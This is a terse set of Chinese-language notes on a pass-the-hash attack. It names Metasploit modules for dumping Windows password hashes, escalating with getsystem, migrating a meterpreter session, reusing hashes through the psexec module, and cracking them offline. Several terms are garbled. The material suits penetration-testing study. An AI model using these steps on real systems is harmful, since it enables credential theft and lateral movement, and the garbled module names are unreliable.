passingthehash获取hash值run post/windows/gather/smart _ hash dump
检查权限和系统类型
检查是否为域控制服务器
从注册表读取散列,并将其注入到lsass进程中
08如果您在服务器上具有管理员权限,请直接访问getsystem
在windows上,如果uac关闭具有管理员权限,则直接读取
03/xp直接获取系统从注册表中获取散列
获取meterpreter,迁移进程,然后提取权限并进行混列
混列传输exploit/windows/smb/psexec
hash解密use post/windows/gather/hash dump
在线破解
脱机解密findmyhash、l0phtcrack
msf模块
use auxiliary/analyze/jtr _ crack _ tast